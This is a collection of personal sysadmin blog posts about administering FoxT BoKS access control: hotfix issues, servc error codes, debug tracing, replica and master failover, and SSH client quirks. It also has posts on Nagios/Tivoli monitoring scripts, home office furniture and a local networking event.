This morning I discovered a bug in one of FoxT's "hotfixes" (aka patch, bugfix) for BoKS 6.0.x. Maybe the problem exists for other BoKS versions as well. The hotfix in question is TFS 061016-115513 which enables BoKS 6.0 to work with the ssh_pk_optional authentication method. Before this hotfix you were forced to use either password or SSH key authentication, but never both. With the hotfix applied you can now use SSH key authentication, but fall back to password if the keys are missing.

Anywho... I found out that on Solaris 10 the hotfix does not actually replace all necessary files if you run BoKS 6.0. Here's the list of files that get replaced:

Sol10 = boks_sshd, mess.eng

Sol8 = boks_sshd, mess.eng, boks_servc_d, method.conf, plus a few GUI forms.

After conferring with BoKS-guru Wilfrid at FoxT it seems that the patch will treat Solaris 10 as client-only systems, which sucks when you're applying it to a replica or master server. In order to fix a Sol10 replica/master you'll need to manually copy the files from the Sol8 part of the fix to their intended destinations. This should work without any problems as Sol10 is fully backwards compatible with Sol8.


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios script: check_cnr

2009-09-14 22:05:00

This script is used to monitor the basic processes that go with Cisco's CNR (Network Registrar), which can be likened to a DHCP server. Cisco's Support Wiki described CNR as follows:

Cisco CNS Network Registrar is a full-featured DNS/DHCP system that provides scalable naming and addressing services for service provider and enterprise networks. Cisco CNS Network Registrar dramatically improves the reliability of naming and addressing services for enterprise networks. For cable ISPs, Cisco CNS Network Registrar provides scalable DNS and DHCP services and forms the basis of a DOCSIS cable modem provisioning system.

As said my script only checks the basics of CNR to ensure that the required daemons are running. It does not actually check any of the functionality, though at a later point in time it may be expanded to include this.


Usage of check_cnr

./check_cnr [-nagios|-tivoli] [-d -o FILE]
-nagios	Nagios output mode (default)
-tivoli	Tivoli output mode
-d	Debug mode
-o 	Output file for debug logging

Output

Depending on which mode you've selected the output of the script will differ slightly.

In Tivoli mode the output will be limited to a numerical value as the script is to be used as a "numeric script". 0 = OK, 1 = WARNING/UNKNOWN, 2 = SEVERE. The exit code of the script will be identical to this value.

In Nagios mode the exit code of the script will be similar to Tivoli's, with the exception that the value 3 indicates an unknown state. The output on stdout includes the service name and state (CNR OK/NOK) and a helpful error message.
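A quick illustration of the two modes; the exact message text will of course depend on what the script finds:

# Nagios mode: "CNR OK/NOK" plus a message on stdout, exit code 0/1/2/3
./check_cnr.sh -nagios ; echo "exit code: $?"

# Tivoli mode: just the numeric result (0 = OK, 1 = WARNING/UNKNOWN, 2 = SEVERE)
./check_cnr.sh -tivoli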


Limitations


Download

Download check_cnr.sh
$ wc check_cnr.sh
189     666    4531 check_cnr.sh

$ cksum check_cnr.sh
4161895780 4531 check_cnr.sh

kilala.nl tags: , , ,

View or add comments (curr. 0)

Coming up: a refresh of my Nagios and Tivoli plugins

2009-09-14 19:35:00

For the longest of times my Nagios plugins have used a rather old-fashioned approach to configuration: everything's hardcoded into the script and you'll need to modify the script to make changes. Obviously that sucks if you want to use the script for multiple purposes. My newer scripts all use command line flags and parameters to pass variables, making them a lot more versatile. Hence I will soon be rewriting all my Nagios plugins for this particular purpose.

I will also be changing their individual pages, putting the plugin back into its own .ksh script instead of including the code into the HTML page. Whatever was I thinking when I did that?!

Finally, I will also be modifying all plugins (including the new ones) to work with multiple monitoring systems. By passing a certain command line option one will be able to choose between modes for Nagios and Tivoli, with possible extensions along the way.

I've got my work cut out for me!


kilala.nl tags: , ,

View or add comments (curr. 0)

Published three new BoKS admin scripts

2009-09-12 23:01:00

The past few months I've been working on some BoKS scripts. Let's say that my daily job's inspired me to write a number of scripts that I just -know- are going to be useful in any BoKS environment. I've got plenty ideas for both admin and monitoring scripts and finally I'm starting to see the fruits of my labour!

All of these scripts were written in my "own" time, so luckily I can do with them as I please. I've chosen to share all these scripts under the Creative Commons license which means that you can use them, change them and even re-use them as long as you attribute the original code to me. I guess it sounds a bit like the GPL.

Anywho, for now I've published three scripts, with more to come! All scripts can be found in the Sysadmin section of my site, in the menubar. So far there are:

1. boks_safe_dump, which creates database dumps for specific hosts and host groups.

2. boks_new_rootpw, which sets and verifies new passwords on root accounts.

3. check_boks_replication, a monitor script to make sure BoKS database replication works alright.

As they say in HHGTTG: Share and enjoy!


kilala.nl tags: , , ,

View or add comments (curr. 1)

BoKS_safe_dump - Script for making BoKS database dumps

2009-09-11 15:30:00

From time to time one will need a BoKS database dump that includes all the tables, but is limited to one or two specific applications. For example, one could be migrating an application or hostgroup to another BoKS domain. Or one might be performing a security audit on a specific group of servers.

This script will make a dump of all BoKS information relevant to a set of specified servers or host groups. It will strip the password information for all accounts (for obvious security reasons).


Usage of boks_safe_dump

./SafeDump.ksh [-g HOSTGROUP] [-h HOST | -f FILE] [-p] -d DIRECTORY
-g HOSTGROUP	Hostgroup to dump the BoKS information for. Multiple allowed.
-h HOST		Host to dump the BoKS information for. Multiple allowed.
-f FILE		List of hostnames to dump the BoKS information for. 
-p		Disable hiding of account passwords for non-root accounts.
-d DIRECTORY  	Location to store the output files.

Examples:
$PROGNAME -f /tmp/hostlist -d /tmp/BOKSdump
$PROGNAME -g HG_APP1 -g HG_APP3 -d /tmp/BOKSdump
$PROGNAME -g HG_APP1 -h HOST1 -h HOST5 -d /tmp/BOKSdump

Output

The script creates a new directory (indicated with the -d flag) which will contain a number of files called tableN. "N" in this case refers to the relevant table from the BoKS database. The following tables are dumped.

01. Contains all user accounts.
02. Binds access routes to individual users.
06. Contains all host information.
07. Binds host groups to hosts.
09. Binds hosts to host groups (reverse of table 7).
15. Binds IP address to hostname (reverse of table 6).
16. Binds access routes to user classes.
17. Contains all user classes.
31. Contains SSH settings for individual users.
47. Contains all Unix groups.
48. Binds secondary Unix groups to individual users.
49. Binds user accounts to user classes.


Limitations


Download

Download boks_safe_dump.ksh
thomas$ wc boks_safe_dump.ksh
380    1462   10781 boks_safe_dump.ksh

thomas$ cksum boks_safe_dump.ksh
3833439207 10781 boks_safe_dump.ksh

kilala.nl tags: , ,

View or add comments (curr. 0)

Known software issues when working with FoxT BoKS

2009-09-11 08:12:00

Unfortunately not all software plays nicely with BoKS. Some of them have special needs, or need to be configured in a particular manner. This page discusses the known issues. Luckily in most cases all you need to do is tweak one or two settings.


ProFTPd

We have found that recent versions of ProFTPd report FROMHOST IP addresses in the IPv6-IPv4 hybrid mode. This currently (Feb 2010) breaks the BoKS login call because the servc daemon cannot process a FROMHOST formatted as ::ffff:192.168.0.1. You will not see any logging in the BoKS transaction log, but if you bdebug the ftpd process on the agent you'll see that servc returns an ERR-9.

For some reason, using the -ipv4 or -4 flags on the command line to force ProFTPd into IPv4 mode does not work. Instead you will need to edit proftpd.conf and set the "UseIPv6" directive to "off" (Source).
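In proftpd.conf that boils down to a single directive (the config file's location differs per distribution); restart proftpd afterwards:

# /etc/proftpd.conf
# Disable IPv6 so FROMHOST is reported as a plain IPv4 address
UseIPv6 off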


F-Secure

Connecting to a BoKS server with F-Secure

SSH keys generated by F-Secure are usually in the SSH2 format. Before you can import them on your BoKS server they will need to be converted to OpenSSH format. You cannot simply add them to ~/.ssh/authorized_keys. This conversion is done using the "ssh-keygen" command on your Unix box.

  1. Copy the source user's SSH2 public key (RSA or preferably DSA) to your server.
  2. Login as the destination user.
  3. Run: cd ~/.ssh
  4. Run: /opt/boksm/bin/ssh-keygen -i -f $PATH/TO/PUBKEY >> authorized_keys

You have now converted and added the public key to the authorized_keys file.

Now, if you forgo the use of SSH keys and would like to use passwords instead, you will need to force F-Secure SSH to use the "keyboard-interactive" authentication method. By default it will use "password", which will not work properly. Both methods are very similar insofar as "keyboard-interactive" actually includes "password" authentication, but it includes a few additional handshakes that BoKS' OpenSSH needs.

If you're coming from a Unix server you'll need to enable "keyboard-interactive" in either your personal ssh_config file, or in the systemwide file under /etc/ssh/ssh_config.
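For the OpenSSH client that would look something like this - a sketch; the option name is standard OpenSSH, but your config path may differ:

# ~/.ssh/config or /etc/ssh/ssh_config
Host *
    PreferredAuthentications keyboard-interactive,password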


Connecting to an F-Secure server with BoKS' OpenSSH

Again there's a difference insofar as F-Secure uses SSH2 keys as opposed to the OpenSSH format. Your key will need to be transformed before transferring it to the remote server. The authorized_keys file on the other side will also work differently from what you're used to. The F-Secure authorized_keys file is not a list of keys, but a list of pubkey file names.

  1. Login as the source user.
  2. Run: cd ~/.ssh
  3. Run: /opt/boksm/bin/ssh-keygen -o -f ./id_dsa.pub
  4. Copy the resulting output.
  5. Login to the remote server as the destination user.
  6. Run: cd ~/.ssh
  7. Paste the copied text into a new public key file, like id_dsa.remote.pub.
  8. Edit the authorized_keys file and add a line: key id_dsa.remote.pub

ComForte SFTP

ComForte is an SFTP client used on Tandem servers. It's not a piece of client software like the ones we're used to! It was originally meant for file transfer between Tandem servers. From our experience it seems to be a daemon running on Tandem that acts as a pass-through for regular FTP traffic, which it then sends through SSH or SSL. It's really rather wonderfully weird :)

We've seen in the past that ComForte SFTP cannot work with keyboard-interactive authentication, since the client software simply does not recognize the method returned by BoKS. Unfortunately to my knowledge BoKS' SSH daemon in turn does not allow the old "password" method to be enabled. Hence with ComForte we must use SSH public key authentication. That's the only way it's going to work.

I have actually never witnessed the configuration process of ComForte, but it seems to work something like this.


Putty and WinSCP

Putty and WinSCP are based on the same piece of simple, elegant software and both should work straight out of the "box". Seeing how they're standalone binaries you won't even have to actually install them in Windows.

If you do discover that your password-based login fails, make sure to check your SSH authentication settings. Just like with F-Secure the "keyboard-interactive" method should be enabled and on the top of your list.

Update 10 Sept 2009:

My colleague Frank vd Bilt has informed me of a semi-bug in a very recent version of Putty. Apparently this version of Putty bombs when used together with the boks_sshd daemon. Even a few "ls -lrt" commands are enough to crash the connection. The error message you'll get is: Disconnected: Received SSH_MSG_CHANNEL_SUCCESS for "winadj@putty.projects.tartarus.org".

You can read the Putty bug report over here.

kilala.nl tags: , ,

View or add comments (curr. 0)

Caveats and gotchas for the FoxT BoKS administrator

2009-09-04 15:19:00

Despite its long life (it's been with us for over ten years now!), BoKS has a number of caveats or gotchas that one needs to keep in mind at all times. Some of the points below clearly fall in the "not a bug, but a feature" category, but that doesn't mean you shouldn't be aware of them.

So, here's a list of things that can easily lead to problems.


No protection against duplicate UIDs and GIDs

BoKS will not prevent you from re-assigning the same UID to many different users, nor will it prevent the re-use of the same GID for different groups. You may do this intentionally or accidentally. Either way it's a very good idea to regularly check for duplicate UIDs and GIDs. The thing is, if such a duplication occurs on a server it will have a very hard time figuring out to whom a file or a process belongs. Usually this is left up to the order in which the entries occur in /etc/passwd or /etc/group.

Obviously it's best NOT to use duplicate UIDs and GIDs. However, preventing this will require a centralised database of some sorts that all your security personnel refer to and which is used to lay claim to unused IDs.
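A quick way to spot offenders on a given host - a minimal sketch that works from the local files only and assumes standard /etc/passwd and /etc/group layouts:

# UIDs that occur more than once in the local passwd file
awk -F: '{ print $3 }' /etc/passwd | sort -n | uniq -d

# GIDs that occur more than once in the local group file
awk -F: '{ print $3 }' /etc/group | sort -n | uniq -d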


No protection against mismatches in UIDs and GIDs

The exact opposite to the previous is also true: BoKS thinks it's perfectly alright for you to use different UIDs for multiple accounts with the same user name. For example, SUN:peter and AIX:peter may have two completely different UIDs. In the case of normal user accounts this may be problematic, but in the case of application accounts (like the "oracle" or "sybase" users) this may lead to disaster.

The same goes for Unix groups: it's possible to have multiple groups with the same names, yet different GIDs. See above for the repercussions.


No protection against manual editing of local files

The way BoKS propagates user accounts and groups to a server is by updating the local security files, such as /etc/passwd and /etc/group. Each time a change is made to a user account BoKS will automatically change the contents of these files. However, there are two issues we have run into with regards to the local security files.

  1. Any information not in BoKS is left untouched.
  2. Manual changes to information from BoKS is not corrected.

Re item 1: Usually a number of accounts present after a default OS install are not added to BoKS; think of users like uucp, lp, nobody and sys. These accounts may be needed at one point in time, so BoKS will leave any accounts or groups it does not have knowledge of alone. It will work around this information in the local security files. This leads to ...

Re item 2: Unfortunately this means that it's possible for someone with root access to add accounts to the server that cannot be traced. Of course, assuming that BoKS is up and running the account cannot be used because there are no access routes. These manual edits, however, may completely mess up other accounts that -are- in BoKS.

Say for example that BoKS contains a user "oracle" with UID 1234. If the local passwd file happens to contain another "oracle" user with UID 1200 (which was possibly added by a post-install script) things will go horribly wrong.

Manual changes to accounts or groups that -do- exist in BoKS are rectified by BoKS. However, this only occurs when you make a change to an account, after which BoKS overwrites the "faulty" information.


No warning against account overlap with user names from different host groups

Simply put, BoKS will not issue any warning if there is an overlap of two user accounts made in different host groups. This becomes especially problematic when combined with the second item on this page: no protection against mismatches in UIDs and GIDs.

Let's say we have user accounts SUN:peter (UID 20001) and ORACLE:peter (UID 21003). Now let's say we add SERVERA to both hostgroups SUN and ORACLE. Both "peter" accounts will be added to /etc/passwd with the confusion that is to be expected.

Again, one can prevent a lot of problems by not using different UIDs for the same account. Also, it is a -very- good idea to minimise the amount of copies that exist of one user. I've seen cases where one person had no less than five different accounts, all with the same name but in different host groups. That's easy to mess up!


kilala.nl tags: , ,

View or add comments (curr. 0)

Impressive: the Ars Technica review of OS X 10.6

2009-09-02 09:30:00

Wow... A few days after OS X Snow Leopard's release the Ars Technica review has become available. As always it's a very impressive document, this time ringing in at 23 pages. The great thing about AT's reviews of OS X is that they always go rather in-depth on the technical aspects, this time starting off on page 3 with an analysis of how file system compression (implemented through a few new hacks) not only saves space, but also speeds up your computer.

Good stuff! Now all I have to do is find an hour or three to read through it all :D


kilala.nl tags: ,

View or add comments (curr. 0)

BoKS troubleshooting: servc error messages in the log file

2009-08-27 08:49:00

BoKS logs all transactions into $BOKS_var/data/LOG, which then gets rotated to another location of your choosing. Every single request that's handled by BoKS gets logged, detailing who did what, where, when and why. If a transaction fails, the servc process will indicate the error message in the log file. This may not always make clear what is wrong (like the infamous and useless ERR223), but it sure helps you in your troubleshooting.

All of the error messages are listed in the BoKS administration manual. However, since a lot of people also choose not to RTFM I thought I might as well copy the list over here ^_^.

You will also find a more up-to-date list of these messages in $BOKS_var/mess.eng, which acts as a translation file between BoKS errors and plain English.





ERR_SERVC_NEED_MORE 2

Sent by servc when it decides it needs more info from a client (NEED=something is set in the string sent back).


ERR_SERVC_GAVE_UP 1

Servc cannot get in contact with database.


ERR_SERVC_COMM_ERROR -1

Communication error. Probably wrong nodekey. Set a new nodekey on the machine. Check also that xservc is running by using lsmqueid.


ERR_SERVC_READ_ERROR -2

Read error from database


ERR_SERVC_WRITE_ERROR -3

Write error to database


ERR_SERVC_CORRUPT_BASE -4

Erroneous database


ERR_SERVC_NO_AUTH -5

No authorization


ERR_SERVC_UNKNOWN_HOST -6

Host unknown


ERR_SERVC_NO_SERVC -7

Call to servc failed


ERR_SERVC_UNKNOWN_CLIENT -8

Unknown client type


ERR_SERVC_BAD_ARGS -9

Internal BoKS Manager error. Argument format error.


ERR_SERVC_OLDPSW_CHANGE -100

The password is too old. Must be changed.


ERR_SERVC_PSW_SHORT -101

The password is too short.


ERR_SERVC_PSW_USE11 -102

At least one digit and one letter in the password.


ERR_SERVC_PSW_USE22 -103

At least two digits and two letters in the password.


ERR_SERVC_PSW_ISSAME -104

The password is similar to the username.


ERR_SERVC_PSW_ISUSED -105

The password has already been used.


ERR_SERVC_PSW_INVALID -106

Invalid password


ERR_SERVC_PSW_CHANGED -107

Password changed


ERR_SERVC_NEW_MISMATCH -109

The new passwords don't match


ERR_SERVC_PSW_LOOKALIKE -110

Password does not differ enough from the previous one


ERR_SERVC_NO_USER -200

The user doesn't exist, will not be displayed even if verbose mode is on


ERR_SERVC_WRONG_PSW -201

Wrong password.


ERR_SERVC_OLDPSW -202

The password is too old.


ERR_SERVC_NO_TTY -203

No terminal authorization granted.


ERR_SERVC_NO_TIME -204

Access denied at this hour.


ERR_SERVC_USER_BLOCKED -205

The user is blocked.


ERR_SERVC_TTY_LOCKED -206

The terminal is blocked.


ERR_SERVC_TOO_MANY_TRIES -207

Too many erroneous login attempts.


ERR_SERVC_OLD_USER -208

The username is not valid.


ERR_SERVC_WRONG_SYSPSW -209

Wrong system password


ERR_SERVC_NO_AUTH_INFO -210



ERR_SERVC_STDLOGIN -211

Tells client that standard unix login should be used


ERR_SERVC_MISSING_SYSPSW -212

Missing system password


ERR_SERVC_NO_REMHOST -213

Remote host missing


ERR_SERVC_BAD_REMHOST -214

Calling host not authorized


ERR_SERVC_NO_PIN -215

Missing PIN code or serial number


ERR_SERVC_WRONG_SPIN -216

Wrong password (SPIN)


ERR_SERVC_NO_LOGIN -217

Login not allowed


ERR_SERVC_NO_SUTO -218

SU to user not allowed


ERR_SERVC_GETKEY_EXHAUSTED -217

# SLAN Login not allowed


ERR_SERVC_GETKEY_CANTDEL -218

# SLAN SU to user not allowed


ERR_SERVC_PASSWD_TOO_NEW -219

Not long enough since last password change


ERR_SERVC_TOO_MANY_CONCUR_LOGINS -220

Too many concurrent logins with your name


ERR_SERVC_CERT_REVOKED -221

Certificate revoked


ERR_SERVC_USERPROTO -222

User-level protocol error (currently from dgsadasp)


ERR_SERVC_AUTH_FAIL -223

Authentication failed (currently from bosas)

kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: tracing the BoKS internals

2009-08-27 08:22:00

FoxT provides us with a number of very useful tools to aid us in troubleshooting BoKS issues. Among others we will frequently use the boksauth and bdebug commands. Bdebug in this case refers to the tracing tool that this article will focus on.

Usually we will want to run a trace when BoKS is doing something that we don't expect. For example:

In each case you will need to determine which BoKS processes are part of the problem. For example:

Before we begin, let me warn you: debug trace log files can grow pretty vast pretty fast! Make sure that you turn on the trace only right before you're ready to use the faulty part of BoKS and also be sure to stop the trace immediately once you're done.

Debugging login issues

In the case of users getting denied access, troubleshooting got a lot easier once we learnt to use the boksauth command. Boksauth allows you to simulate a login request by a user, without actually having access to the account, the password or the source host. For example:

BoKS > boksauth -Oresults -r'ssh:192.168.0.128->SERVERA' -c FUNC=auth PSW="vljwvHlx3zS35" \
FROMHOST=192.168.0.128 TOHOST=SERVERA TOUSER=patrick ERRMSG=

The command above will test a login from 192.168.0.128, using SSH to user patrick@SERVERA. Assuming that you're testing a failing login, the output will include something like "ERRMSG=No terminal authorization granted."

In order to see what's actually going wrong you will need to start a debug trace on the servc process on the same master/replica where you run the boksauth command. This is done by entering:

BoKS > bdebug -x9 -f /tmp/servc.trace servc

Repeat the boksauth command and then immediately afterwards run the following command to turn off the trace again:

BoKS > bdebug -x0 servc

The file /tmp/servc.trace will now contain the debug output for all transactions parsed in the past few seconds, including the failed simulated login you did with boksauth. Debug output is rather lengthy and difficult to read so either you'll need half an hour to dig through it, or you can send it to FoxT's tech support department so they can explain it for you.

Debugging other issues

As I mentioned you can use bdebug to run traces on any BoKS process you can think of. In each case you'll use "bdebug -x9" to turn debugging on and "bdebug -x0" to turn it off again. In order to properly troubleshoot your issues you'll need to decide which processes to trace and then, with the trace running, try to replicate the problem.

In the case of replication issues you'll:

If a client is not receiving updates, you'll:


kilala.nl tags: , ,

View or add comments (curr. 0)

FoxT BoKS international users group

2009-08-27 08:20:00

The Fox Tech logo

Users and administrators of the BoKS Access Control software seem to be spread out quite thinly across the globe. Most companies that employ BoKS are quite large, but there's only a few in each country that actually do so. So far, to my knowledge, the Netherlands only has one multinational using BoKS with two others considering an implementation of their own.

Since there isn't very much BoKS information available on the web I thought I'd create a users group on LinkedIn. LI.com is a great site for maintaining your professional network and for keeping in touch with colleagues both old and new. Hence it's also a nice and easy way to set up a discussion board for professionals.

I'm very curious to see if we can entice BoKS admins from countries other than the Netherlands to join. It'd be great if we could set up discussions between users across the globe. Maybe we could even coordinate feature requests and bug reports to lighten the load on FoxT and to make sure the really important requests get handled first.

Spreading information about BoKS on the web

Slowly but surely we are working on making more information about BoKS available through the Internet. Friends and colleagues have started writing tutorials and case studies, which (by the providence of Google) should turn up when people search for information.

Below you'll find a list of the efforts I've tracked down so far.


kilala.nl tags: , ,

View or add comments (curr. 1)

Integrating FoxT BoKS in Solaris Service Management Facility (SMF)

2009-08-18 12:37:00

As we all know BoKS is available for a multitude of flavors of Unix. Aside from a number of Linux distributions, it also runs on AIX, HP-UX, Solaris and even on Windows. Because of this diverse choice of platforms FoxT is of course forced to make design choices that point towards the lowest common denominator.

In some cases these design choices lead to undesirable situations, which one will need to work around. One such case is Solaris 10, which chooses to forgo the ancient Unix staple of /etc/inetd.conf, /etc/init.d/, /etc/rc?.d/ and /etc/inittab. Instead, Sun Microsystems has chosen to create their own service management facility, aptly called Solaris SMF.

In Solaris 10 the SMF software is used to manage the startup and shutdown sequences of the server, as well as the current state of many running applications. For example, where one would originally type "/etc/init.d/openssh start" one now enters "svcadm enable svc:/network/ssh:default".

BoKS however still relies on the old fashioned scripts for its startup and shutdown as it can expect to find these on all Unixen. However, during the execution of one of our projects Unixerius have decided to make a patch for BoKS that will allow the software to work reliably from SMF.


Patching BoKS for use with Solaris SMF

In order to get BoKS to work with SMF we'll need to make a number of changes to both BoKS and the Solaris operating system. We are currently not aiming for a full switch from /etc/rc3.d and boksinit to SMF, but instead opt to only include the minimum into SMF.

The way we see it, we'll need to make the following changes:

*: And boksinit.replica and boksinit.master.

The above should allow us to stop and start BoKS independently of the BoKS SSH daemon. If you wouldn't do this SMF would kill boks_sshd along with the rest of BoKS. It will also allow us to use "Boot -k" and "Boot", which will then interact with SMF instead of just killing PIDs from a list.
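To sketch where this is headed (nothing here is an official FoxT deliverable; the FMRI svc:/site/boks_sshd and the manifest path are made-up examples):

# Import a hand-written SMF manifest for the SSH daemon
svccfg import /var/svc/manifest/site/boks_sshd.xml

# Start and stop boks_sshd independently of the rest of BoKS
svcadm enable svc:/site/boks_sshd
svcadm disable -t svc:/site/boks_sshd

# Inspect its state and dependencies
svcs -l svc:/site/boks_sshd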

Please give us a few weeks to work out this patch. Of course we'll post news both over here and on the Unixerius website once the work is done.


Further resources about SMF


kilala.nl tags: , ,

View or add comments (curr. 0)

My new home office

2009-08-08 09:59:00

My new desk and chair.

Yesterday I finally took delivery of the furniture for my home office in the attic. After fighting the Madeko logistics department for two days the truck finally showed up at 1700, Friday afternoon =_=

Putting my annoyance with the logistics team aside, I'm quite happy with Madeko. They have a huge range of products and their drivers/techies/salespeople are very friendly. A few weeks ago I spent an hour on a Saturday morning going through their warehouse in Maarsbergen and it was a blast. Arjan was a great fellow and really helped me out in my choice of a desk.

He finally steered me towards the desk shown above, a Gispen Work desk which is height adjustable (with a crank) and which comes with a custom made desktop. The top is not made out of MDF like most desks are these days, but instead it consists of eighteen layers of plywood (multiplex in dutch). This makes the top bloody heavy (over forty kilos), but it's also sturdy and I can always sand it down and re-lacquer it if I feel like it.

The frame itself is rather oddly shaped, but is pretty nifty. It's actually not the legs that extend when you crank the desk, but the desktop itself is lifted on a jack-like mechanism. Very nifty and with no wobble at all.

The chair's a Comforto System 70, which is the same kind of chair we use at $CLIENT. It's been reupholstered and restored and, while a little bit wobbly, it's a good chair in the ergo department.

Both pieces of furniture are secondhand, the desk setting me back 150 euros and the chair 250. With delivery and taxes I ended up a bit over five hundred euros. That's a sight better than the near seven hundred euros I originally paid for the GDB Vegas desk.

Now, things left to do:

* Get rubber wheels for the chair so I don't damage the floor.

* Cannibalize a small coffee table to make a shelf for my Macbook.

* Get a Samsung 24" screen with a Flextronic LX swivel arm.

Putting it all together I actually stayed almost four hundred euros under budget!


kilala.nl tags: , ,

View or add comments (curr. 3)

Disaster recovery (fail over) of the BoKS infrastructure

2009-08-04 22:01:00

The BoKS infrastructure is pretty much rock solid and will not let you down under normal circumstances. However, "normal" doesn't always happen so it's good to prepare for a disaster. What happens if you lose a replica or two? What happens if the BoKS master server itself is dead? It pays to come prepared!


Adding new BoKS replica servers

Luckily BoKS replica servers are pretty expendable. One needs at least one replica server per physical location, though it pays to have more than one. Moreover you may want to have a replica per section of your network.

By having a good number of replica servers you won't be caught off guard by a network failure. Having a set of replicas per data center ensures that all your hosts will remain functional, even if your WAN connections die. And having a replica per network section will allow you to keep operating, despite failure of backbone routers and such.

Should you ever feel the need to add more replica servers, then you can take the following steps to create new ones. However, keep in mind that you'll need to be able to communicate with the master server, so this won't do you any good if the network's already dead.

First, modify the host record of your targeted client system through the BoKS GUI. Change the host type from UNIXBOKSHOST to BOKSREPLICA. Then, on the client system perform the following commands.

# /opt/boksm/sbin/boksadm -S

BoKS> vi $BOKS_etc/ENV      #set SHM_SIZE to 16000

BoKS> convert -v server
Stopping daemons...
Setting BOKSINIT=server in ENV file...
Restarting daemons...
Conversion from client to replica done.

BoKS> Boot -k

BoKS> Boot

Finally, also restart the BoKS master software. Running "boksdiag list" should now show the new replica server, which is probably still loading its copy of the database.
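A quick sanity check after the conversion might look like this (just a sketch; the status values are the ones described in the replication troubleshooting article elsewhere on this site):

# On the master, in a BoKS shell: the new replica should appear in the list,
# first with status "loading" while it pulls the database, then "ok".
BoKS> boksdiag list

# On the new replica: the error log should stay quiet.
BoKS> tail -20 /var/opt/boksm/boks_errlog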


Performing a BoKS master fail-over

Without a working master server the BoKS infrastructure will keep on functioning. However, it is impossible to make any changes to the database, so it's a good idea to restore your master as soon as possible. Promote a replica to master status if you think it'll take you more than a few hours (a day?) to fix the server.

Log in to your chosen replica and perform the following actions. Start off by checking the boks_errlog file to see if the replica itself isn't broken.

$ /opt/boksm/sbin/boksadm -S

BoKS> tail -30 /var/opt/boksm/boks_errlog
...
...

BoKS> convert -v master

Stopping daemons...
Setting BOKSINIT=master in ENV file...
Restarting daemons...
Conversion from replica to master done.

BoKS> boksdiag list
SERVER      SINCE LAST PCKT   SINCE LAST FAIL   SINCE LAST SYNC   COUNT     LAST STATUS
REPHOST5    00:49             523D 5:19:20      04:49             1853521   OK
REPHOST4    00:49             136D 22:21:35     04:49             526392    OK
REPHOST3    00:49                               04:50             726768    OK
REPHOST2    00:49             107D 5:05:33      04:49             425231    OK
REPHOST     02:59             02:13             11:44             148342    DOWN

BoKS> boksdiag sequence
...
T7 13678d 8:33:46 5053 (5053)
...
T9 13178d 11:05:23 7919 (7919)
...
T15 13178d 11:03:16 1865 (1865)
...

Now log in to the remaining replica servers and compare the output of the "boksdiag sequence" commands. Alternatively you can run the check_boks_replication script to automate the process. Either way, none of the replicas should be ahead of the new master, nor should any of them lag too far behind. If you do find that the replication is broken we'll need to proceed with troubleshooting.
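If you don't have the check_boks_replication script at hand, a throwaway loop like this does the comparison by hand (only a sketch: it assumes root ssh access from the master to the replicas and the default /opt/boksm install path, and the replica names are examples):

# Dump the master's sequence numbers, then each replica's, and eyeball the differences.
/opt/boksm/sbin/boksadm -S boksdiag sequence > /tmp/seq.master

for REPLICA in REPHOST2 REPHOST3 REPHOST4 REPHOST5
do
    echo "=== $REPLICA ==="
    ssh $REPLICA "/opt/boksm/sbin/boksadm -S boksdiag sequence" > /tmp/seq.$REPLICA
    diff /tmp/seq.master /tmp/seq.$REPLICA
done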


Rolling back after the BoKS master fail-over

Assuming that you will not be using your new master server permanently you will want to go back to your original BoKS master at some point in time. Let's assume that you've repaired whatever damage there was and that the system is now ready to resume its duty.

It's crucial that the original master be converted to a client system before booting it up fully. Perform the following in single user mode.

$ /opt/boksm/sbin/boksadm -S

BoKS> convert -v client
Stopping daemons...
Setting BOKSINIT=client in ENV file...
Restarting daemons...
Conversion from master to client done.

BoKS> cd /var/opt/boksm/data

BoKS> rm *.dat

BoKS> rm sequence

You may now boot the original master server into multi-user mode and let it rejoin the BoKS infrastructure as a client. Afterwards, convert it into a replica server per the instructions in the first paragraph of this page.

Once the original master server has become a fully functioning replica server you may start thinking about dismantling the temporary master. This process will actually be quite similar to what we've done before. Basically you:

  1. Reboot the temporary master into single user mode.
  2. Convert the temporary master into a client (see above).
  3. Convert the original master server back into a master (see second paragraph).
  4. Boot the temporary box into multi-user mode.
  5. Convert the temporary box back into a replica.

kilala.nl tags: , ,

View or add comments (curr. 0)

Working from home: scripting, BoKS and virtualization

2009-07-29 08:57:00

Given the fact that Marli can't currently provide the required care to our kid (due to her burnt hand), I've been working from home the past two days. With any luck Mar's hand will be healed by tonight and I'll get back to the office. In the mean time I've been scripting my ass off, getting more things done in two days than I usually do in a week. "I'm on a roll", as they say.

I had a list of five or six scripts that I wanted to write that work with FoxT's BoKS security software. Most of them are monitoring scripts that work with Tivoli (Nagios conversions coming up soon), with two sysadmin scripts to complete the set.

In order to test these scripts I'm setting up a test network, all thanks to the wonders of Parallels Desktop. I admit that the 4GB of RAM in my Macbook is a bit anemic for running two Linux servers and a Solaris server, but it'll do for now. Maybe I ought to get a proper Mac Pro again. :)

Installing Solaris x86 in Parallels took a few tries, but I finally got it working, thanks to some tips found on the web.

* Give it a minimum of 512 MB RAM

* A small hard drive is fine, but don't set it to autoextend.

* Set 800x600 and 1024x768 as native display resolutions.

* Don't use the graphical/X11 installer, but go the console route.

EDIT:

This tutorial by Farhan Mashraqi was indispensable in getting the Realtek emulated network card to work under Solaris.


kilala.nl tags: , ,

View or add comments (curr. 0)

Wow, that new Airport Extreme is really something!

2009-06-30 17:39:00

As described earlier I got one of those new Airport Extreme base stations for our new IT setup at home. I have to say, it's really something!

Of course the setup was a snap and I easily set it up like our old AExpress. Connecting to the new 5GHz network was just as easy, and the old Kilala network's still there for my iPhone and Kaijuu's laptop. But what's astonishing is the range of the new 5 gig net! I'm typing this up in the attic, where (according to Speedtest.net) I'm getting a 12.2 / 1.7 Mbps connection. One floor down in the bedroom we're at 27.3 / 2.5, just like downstairs. That's pretty damn good! The old 2.4 GHz net would not have reached up into the attic.

Now all I need to do is worm the cat5e cable through the house, to get full 1 Gbps upstairs for backups, file sharing and printing.


kilala.nl tags: , , ,

View or add comments (curr. 3)

Open Coffee networking event in Almere

2009-05-19 21:44:00

The Open Coffee Almere logo.

Taking a page out of the good book on Open Coffee networking events, I've decided to start one for Almere. Following the example of the original Open Coffee event, we'll gather every month (same Bat-time, same Bat-channel!) to meet new people over a cup of hot Java.

To get things going I've opened the Open Coffee Almere group at LinkedIn.com. With a bit of luck we'll get a few dozen members soon.

